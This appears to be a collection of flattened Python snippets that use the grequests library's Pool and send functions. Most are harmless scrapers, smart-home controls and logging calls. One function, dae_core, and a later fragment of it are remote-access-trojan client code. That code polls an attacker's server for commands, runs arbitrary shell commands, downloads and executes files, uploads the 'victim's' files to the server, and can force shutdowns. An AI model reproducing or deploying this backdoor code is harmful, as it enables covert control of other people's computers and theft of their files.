def quote_extract(): prog_count = 0 ticker = 0 #initalise grequests to use reqs = (grequests.get(link) for link in links) resp = grequests.imap(reqs, grequests.Pool(1)) def SQL_commit(): nonlocal quotes cur.execute( '''INSERT or REPLACE INTO Quote_link (quote_link) VALUES ( ? )''', (quotes, )) cur.execute('SELECT id FROM Quote_link WHERE quote_link = ?', (quotes, )) quote_link_id = cur.fetchone()[0] conn.commit() for i in resp: soups = BeautifulSoup(i.text, 'lxml') for j in soups.find_all('a', class_='actionLink', attrs={'href': re.compile("^/work/quotes")}): quotes = (j.get('href')) prog_count += 1 progress = (str(round((prog_count / book_n) * 100, 1))) ticker += 1 if ticker == 3: print("Currently at %", progress, "completion.") ticker = 0 SQL_commit()
def trainingCost(): start_time = time.time() priceOrderArray = [] priceArray = [] reqs = (grequests.get(link) for link in trainingLinks) resp = grequests.imap(reqs, grequests.Pool(20)) for r in resp: soup = BeautifulSoup(r.text, 'lxml') ovr = textCleaner( soup.find("div", class_="list-info-player__ovr").span.text) ratingPrice = round( priceCleaner( soup.find("div", class_="player-listing__price-value").text)) trainingCostValue = ratingPrice / qsCheck(float(ovr)) trainingCostValue = round(trainingCostValue, 2) priceOrderArray.append(str(trainingCostValue)) priceArray.append( ("[Rated: " + str(ovr) + "]" + "[Buying at: " + str(ratingPrice) + "]" + "[C/T: " + str(trainingCostValue) + "]")) CheapestPriceIndex = priceOrderArray.index(min(priceOrderArray)) print("....Here you are: ") print("\n".join(priceArray)) print("The cheapest option is this: \n") print(priceArray[(20 - (priceOrderArray.index(min(priceOrderArray))))]) totalTime = time.time() - start_time print("--- %s seconds ---" % (round(totalTime, 2)))
def send_alarm_on(): global last_sent_status_was_on if not last_sent_status_was_on: print("Alarm ON") _ = grequests.send(grequests.get(f"https://{IP}/on"), grequests.Pool(1)) last_sent_status_was_on = True
def quote_extract(links): prog_count = 0 ticker = 0 #initalise grequests to use reqs = (grequests.get(link) for link in links) resp = grequests.imap(reqs, grequests.Pool(1)) #opens up grequests and finds tags within each consecutive webpage for the quote hyperlink # pulls the quote hyperlink to produce #for j in range(len) for i in resp: soups = BeautifulSoup(i.text, 'lxml') for j in soups.find_all('a', class_='actionLink', attrs={'href': re.compile("^/work/quotes")}): quotes = (j.get('href')) prog_count += 1 progress = (str(round((prog_count / book_n) * 100, 1))) ticker += 1 if ticker == 1: print("Currently at %", progress, "completion.") ticker = 0 def commit(): cur.execute( '''INSERT or REPLACE INTO Quote_link (quote_link) VALUES ( ? )''', (quotes, )) cur.execute('SELECT id FROM Quote_link WHERE quote_link = ?', (quotes, )) quote_link_id = cur.fetchone()[0] conn.commit() commit()
def send_alarm_off(): global last_sent_status_was_on if last_sent_status_was_on: print("Alarm OFF") _ = grequests.send(grequests.get(f"https://{IP}/off"), grequests.Pool(1)) last_sent_status_was_on = False
def createPoint(x, y): r = grequests.post('http://api.sconce.dev/jobs/1/points.json', data={ 'x': x, 'y': y }) grequests.send(r, grequests.Pool(10))
def log_extra_data(self, params, campaign, request, to_phone, call_index): debug_mode = self.debug_mode def finished(res, **kwargs): if debug_mode: print "FFTF Extra Data log call complete: %s" % res ip = hashlib.sha256(request.values.get("ip_address", "")).hexdigest() user_phone = params.get('userPhone', None) org = params.get('org', 'fftf') if not user_phone: user_phone = request.values.get('From', '+15555555555')[-10:] data = { 'key': self.api_key, 'campaign_id': campaign['id'], 'from_phone_number': string.replace(user_phone, "-", ""), 'to_phone_number': string.replace(to_phone, "-", ""), 'ip_address': ip, 'call_index': call_index, 'org': org } if self.debug_mode: print "FFTF Log Extra Data sending: %s" % data url = 'https://queue.fightforthefuture.org/log_phone_call' req = grequests.post(url, data=data, hooks=dict(response=finished)) job = grequests.send(req, grequests.Pool(self.pool_size)) return
def _handle_requests( self, tasks: Iterable[AzureLogRecord], stream: bool = False, exception_handler: Callable = None, gtimeout: Optional[int] = None, ) -> None: """Concurrently handles a collection of AzureLogRecords to convert the requests to responses. :param tasks: a collection of AzureLogRecord objects. :param stream: If True, the content will not be downloaded immediately. :param exception_handler: Callback function, called when exception occured. Params: Request, Exception :param gtimeout: Gevent joinall timeout in seconds. (Note: unrelated to requests timeout) """ tasks = list(tasks) pool = grequests.Pool(self._configuration.max_concurrent_requests) jobs = [grequests.send(rec.log_request, pool, stream=stream) for rec in tasks] grequests.gevent.joinall(jobs, timeout=gtimeout) for record in tasks: if record.log_request.response is not None: record.log_response = record.log_request.response elif exception_handler and hasattr(record.log_request, "exception"): record.log_response = exception_handler(record.log_request, record.log_request.exception) else: record.log_response = None
def map(requests, stream=False, size=None, exception_handler=None, gtimeout=None, success_handler=None): """Concurrently converts a list of Requests to Responses. :param requests: a collection of Request objects. :param stream: If True, the content will not be downloaded immediately. :param size: Specifies the number of requests to make at a time. If None, no throttling occurs. :param exception_handler: Callback function, called when exception occured. Params: Request, Exception :param gtimeout: Gevent joinall timeout in seconds. (Note: unrelated to requests timeout) :param success_handler: Callback function, called when secceed. Params: Request """ requests = list(requests) pool = grequests.Pool(size) if size else None jobs = [grequests.send(r, pool, stream=stream) for r in requests] grequests.gevent.joinall(jobs, timeout=gtimeout) ret = [] for request in requests: if request.response is not None: ret.append(request.response) success_handler and success_handler(request) elif exception_handler and hasattr(request, 'exception'): ret.append(exception_handler(request, request.exception)) else: ret.append(None) return ret
def tools_send_door_state(self): print("Updating Jeedom") req = grequests.get( "%s%s%s" % (self.CONF["JEEDOM"]["PROTOCOL"], self.CONF["JEEDOM"]["HOST"], self.CONF["JEEDOM"]["API_URL"].replace( "{key}", self.CONF["JEEDOM"]["API_KEY"]).replace( "{id}", self.CONF["JEEDOM"]["CMD_ID"][self.door_state]))) grequests.send(req, grequests.Pool(1))
def get_txt(links): reqs = (grequests.get(link) for link in links) # 建立請求集合 response = grequests.imap(reqs, grequests.Pool(5)) #print(response) for i in response: i.encoding = 'utf-8' html = etree.HTML(i.content) # 解析HTML原始碼 txt = html.xpath('//div[@id="article-content-inner"]/p//text()') print(txt) with open("test.txt", "a", encoding='utf8') as f: f.writelines(txt)
def turnLightOff(self, deviceId): # The grequests library sends the request as soon as we create "job" below. We then yield to the greenlet every hundredth of a second # in the main update method to ensure we capture the result. req = grequests.put( 'http://{ip}/api/{username}/lights/{devId}/state'.format( ip=hub['IP'], username=hub['username'], devId=deviceId), callback=printStatus, data='{"on":false}', timeout=4) job = grequests.send(req, grequests.Pool(1)) job.link_exception(lambda *kwargs: sys.stdout.write( "There was an exception with the Hue request"))
def turnLightOff(self, deviceId): # The grequests library sends the request as soon as we create "job" below. We then yield to the greenlet every hundredth of a second # in the main update method to ensure we capture the result. base64string = base64.encodestring( '%s:%s' % (hub['username'], hub['password'])).replace('\n', '') req = grequests.get( 'http://{ip}/3?0262{devId}0F13FF=I=3'.format(ip=hub['IP'], devId=deviceId), callback=printStatus, timeout=4, headers={"Authorization": "Basic %s" % base64string}) job = grequests.send(req, grequests.Pool(1)) job.link_exception(lambda *kwargs: sys.stdout.write( "There was an exception with the Insteon request"))
def async_request(handler_name): global outstanding r = grequests.post('http://%s:8080/runLambda/%s' % (config['host'], handler_name), headers=HEADERS, data=json.dumps({"name": "Alice"}), hooks=dict(response=async_response)) job = grequests.send(r, grequests.Pool(1)) with async_lock: outstanding += 1 return
def append_comments(parent): if "kids" in parent: pool = grequests.Pool(100) for i, kid_id in enumerate(parent["kids"]): kid_url = "{}{}.json".format(api_item_url, kid_id) request = grequests.get(kid_url, hooks={ "response": append_decorator( append_comment, parent, i) }) grequests.send(request, pool) pool.join()
def scrap_unis_page(lst_url): infos_uni = [] reqs = (grequests.get(link) for link in lst_url) resp = grequests.imap(reqs, grequests.Pool(20)) for r in resp: try: soup = BeautifulSoup(r.text, 'lxml') info = scrap_uni_contact(soup) info = [lst_url.index(r.url[:4] + r.url[5:]), r.url ] + info[:7] + info[8:] infos_uni.append(info) except Exception as e: print("Unexpected output : {}".format(e), file=sys.stderr) infos_uni.sort() infos_uni = [info[1:] for info in infos_uni] return (infos_uni)
def test_fetch_cards_sending_requests_by_batches_not_blocking_for_responses(): """ Send requests but don't block for the response. Use a request pool to keep a threshold of maximum number of requests. Use a callback to get notified of the response. """ urls = [mtgurl.make_vanilla_url(cardname) for cardname in CARDS] reqs = (grequests.head(url, allow_redirects=True, callback=_on_response) for url in urls) pool = grequests.Pool(30) for req in reqs: grequests.send(req, pool) # Don't exit until we received the responses, otherwise we may lose some of them import time time.sleep(20)
def scrap_papers_page(papers_url, add): all_papers = [] for (i, papers) in enumerate(papers_url): reqs_papers = (grequests.get(link) for link in papers) resp_papers = grequests.imap(reqs_papers, grequests.Pool(20)) for r in resp_papers: try: soup = BeautifulSoup(r.text, 'lxml') infos_paper = scrap_paper_page(r.url, str(i + add + 1), soup) if infos_paper == None: continue for info_paper in infos_paper: all_papers.append(info_paper) #print("infos: ", info_paper) except Exception as e: print("Unexpected output : {}".format(e), file=sys.stderr) #TODO -> populate db with papers_info return all_papers
def get_player_rsp(player_urls): player_rsp_pool = grequests.Pool(len(player_urls)) for player_url in player_urls: player_url = player_url.strip() # remove the newline at the end # fetch player_id for this guy player_id = re.findall(r'\d+', player_url)[0] # fetch RSP using sale URL sale_url = "http://hitwicket.com/player/sell/{0}".format(player_id) req = grequests.get( sale_url, headers=headers, cookies=cookies, hooks={'response': [parse_rsp_factory(player_url=player_url)]}) grequests.send(req, player_rsp_pool) print "waiting for responses for 5 seconds..." time.sleep(5) return player_rsp
async def on_message(message): if message.author == client.user: return if message.content.startswith('$price'): priceArray = [] priceOrderArray = [] start_time = time.time() await message.channel.send("Please wait...") reqs = (grequests.get(link) for link in trainingLinks) resp = grequests.imap(reqs, grequests.Pool(20)) for r in resp: soup = BeautifulSoup(r.text, 'lxml') ovr = textCleaner( soup.find("div", class_="list-info-player__ovr").span.text) ratingPrice = round( priceCleaner( soup.find("div", class_="player-listing__price-value").text)) trainingCostValueW = ratingPrice / qsCheck(float(ovr)) trainingCostValue = round(trainingCostValueW, 2) priceOrderArray.append(str(trainingCostValueW)) priceArray.append(("[Rated: " + str(ovr) + "]" + "[Buying at: " + str(ratingPrice) + "]" + "[C/T: " + str(trainingCostValue) + "]")) CheapestPriceIndex = priceOrderArray.index(min(priceOrderArray)) await message.channel.send("....Here you are: ") await message.channel.send("\n".join(priceArray)) await message.channel.send("The cheapest option is this: \n") await message.channel.send( priceArray[(20 - (priceOrderArray.index(min(priceOrderArray))))]) totalTime = time.time() - start_time await message.channel.send("--- %s seconds ---" % (round(totalTime, 2)) )
def get_async_web_response(url, method='GET', params=None, headers=None, encode=False, verify=None, use_verify=False, callback=None): import grequests # make a string with the request type in it: response = None request = None try: if 'POST' == method: if use_verify: request = grequests.post(url, data=params, headers=headers, verify=verify, callback=callback) else: request = grequests.post(url, data=params, headers=headers, callback=callback) else: request = requests.get(url, data=params, headers=headers, callback=callback) if request: response = grequests.send(request, grequests.Pool(1)) return response else: return response except: return response
def post_to_leaderboard(self, fftf_campaign, stat, data, host, session): debug_mode = self.debug_mode def finished(res, **kwargs): if debug_mode: print "FFTF Leaderboard call complete: %s" % res data = { 'campaign': fftf_campaign, 'stat': stat, 'data': data, 'host': host, 'session': session } if self.debug_mode: print "FFTF Leaderboard sending: %s" % data url = 'https://leaderboard.fightforthefuture.org/log' req = grequests.post(url, data=data, hooks=dict(response=finished)) job = grequests.send(req, grequests.Pool(self.pool_size)) return
def __init__(self, intent_callback, error_callback, access_token): self.__log_level = _LOG_LEVEL super(WitInterpreter, self).__init__(intent_callback, error_callback) assert access_token != "" self.access_token = access_token self.request_pool = grequests.Pool(2)
def dae_core(): global working_directory1 global caesar_folder global delay handshake_req() no_response = 0 subprocesses = [] while 1: # Checking if some subprocess has terminated if subprocesses != []: non_terminated = [] for process in subprocesses: # If process has terminated: if process[0].poll() != None: out = process[0].stdout.read() err = process[0].stderr.read() output = err if err != '' else out command = process[1]['command'] task_id = process[1]['task_id'] working_directory1 = process[1]['wd'] r = requests.post (caesar_folder + '/target/output.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id, 'output': output, 'wd': quote(working_directory1)}) else: non_terminated.append (process) subprocesses = non_terminated non_terminated = [] # Check if there are new commands to execute r = requests.post (caesar_folder + '/target/tasks.php', data={'unique_id': unique_id}) response = r.text # If the response from the server is not empty if response != '': # Splitting the response in order to get a list of commands to execute (and their identifiers) commands = split_response (response, '<command>', '</command>') ids = split_response (response, '<task_id>', '</task_id>') # Executing all commands contained in the list for command, task_id in zip(commands, ids): # If the user want a remote pseudo-connection if command == 'connect': delay = 1 output = 'connected' elif command == 'exit': delay = 10 output = 'exit' elif command == 'help': shell_help_link = caesar_folder + '/shell_help.txt' help_result = requests.get(shell_help_link).text output = help_result elif command == 'shutdown': subprocess.call('shutdown -s -t 5 -f',shell=True) output = '[*] Target PC Will Shutdown in 5 sec.' elif command == 'restart': subprocess.call('shutdown -r',shell=True) output = '[*] Target PC will restart in 5 sec.' elif command == 'logoff': subprocess.call('shutdown -l',shell=True) output = '[*] Target PC Will Log Off in 5 sec.' elif command.startswith('show.'): current_user = getpass.getuser() to_show = command.split('.') subprocess.call('msg ' + current_user + ' ' + to_show[1],shell=True) output = '[*] The massege will be shown to victim for 60 sec.' elif command.startswith('cd '): try: directory = command.replace('cd ', '') os.chdir(directory) working_directory1 = os.getcwd() output = '' except OSError as e: output = e.strerror + "\n" elif command.startswith('download_from_web '): link_to_down = command.split(' ') download_link = link_to_down[1] downloaded_file = download_file(download_link) output = '[*] ' + downloaded_file + ' Is Downloaded.' elif command.startswith('dae '): link_to_down = command.split(' ') download_link = link_to_down[1] downloaded_file = download_file(download_link) working_directory1 = os.getcwd() file_to_execute = working_directory1 + '\\' + downloaded_file subprocess.call(file_to_execute, shell=True) output = '[*] ' + file_to_execute + ' Is executed.' # If the attacker want the victim to upload a file to the remote server elif command.startswith('download '): filename = command.replace ('download ', '') if os.path.isfile(filename): files = {'file_to_upload': open(filename,'rb')} # Start the download without blocking the process r = grequests.post(caesar_folder + '/target/upload.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id}, files=files) job = grequests.send(r, grequests.Pool(1)) output = 'The file is being uploaded to the server' else: output = 'Inexistent file..' else: if os.name == 'nt': process = subprocess.Popen (command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) else: process = subprocess.Popen ([command], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, close_fds=True) # Time for the subprocess to spawn sleep (0.5) # If the execution of the process has terminated immediately if process.poll() != None: out = process.stdout.read() err = process.stderr.read() output = err if err != '' else out # Else add the process to the list of non-terminated subprocesses else: new_subprocess = [] # Appending to the list of subprocesses the instance of subprocess new_subprocess.append(process) # Appending to the list of subprocesses a dictionary containing metadata of the process new_subprocess.append({'command' : command, 'task_id' : task_id, 'wd' : working_directory1}.copy()) subprocesses.append(new_subprocess) output = 'executing' # Send the output to the server r = requests.post (caesar_folder + '/target/output.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id, 'output': output, 'wd': quote(working_directory1)}) sleep (delay) else: # If the attacker is running a pseudo-interactive shell and he's not issuing commands if (delay != 10): # Increment the number of no-responses no_response += 1 # If there are too many no-responses from the server reset the delay (close the interactive-shell) if no_response == 60: delay = 10 no_response = 0 sleep (delay)
def grequest_page(strings, index): return grequests.imap((grequests.get(string) for string in strings), grequests.Pool(index))
# If the attacker want the victim to upload a file to the remote server elif command.startswith('download '): filename = command.replace('download ', '') if os.path.isfile(filename): files = {'file_to_upload': open(filename, 'rb')} # Start the download without blocking the process r = grequests.post(caesar_folder + '/target/upload.php', data={ 'unique_id': unique_id, 'command': command, 'task_id': task_id }, files=files) job = grequests.send(r, grequests.Pool(1)) output = 'The file is being uploaded to the server' else: output = 'Inexistent file..' else: if os.name == 'nt': process = subprocess.Popen(command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) else: process = subprocess.Popen([command],
def __init__(self, callback=None): # Provide a way to change callback so we can change if needed. The best example that comes to mind is in tests. self.buffer = callback or self.process_response self.pool = grequests.Pool(1)
def grequest_page(strings, index): reqs = (grequests.get(string) for string in strings) resp = grequests.imap(reqs, grequests.Pool(index)) return resp
def crawlURL(self, url): headers = {'User-Agent': random.choice(UserAgents)} req = grequests.get(url, headers=headers, hooks=dict(response=self.done_loading)) grequests.send(req, grequests.Pool(1))
for a in soup.find_all('a'): if "last page" in str(a): a_text = a.text last_page = int(a_text.replace("[", "").replace("]", "")) # Build a list of URLs to scrape URLs = [] for i in range(2, last_page + 1): html_file = str(i) + ".html" if html_file not in scrapped: URLs.append("https://www.boardgamegeek.com/users/page/" + str(i) + "?country=&state=&city=") reqs = (grequests.get(link) for link in URLs) resp = grequests.imap(reqs, grequests.Pool(10)) for r in resp: url = r.url i = url.split("?")[0].split("/")[-1] soup = BeautifulSoup(r.text, "lxml") save_soup(soup, i) """ with ProcessPoolExecutor(max_workers=4) as executor: futures = [ executor.submit(download_and_save, url) for url in URLs ] results = 0 for result in as_completed(futures): results + 1 """ """ for i in range(2, last_page + 1): html_file = str(i) + ".html"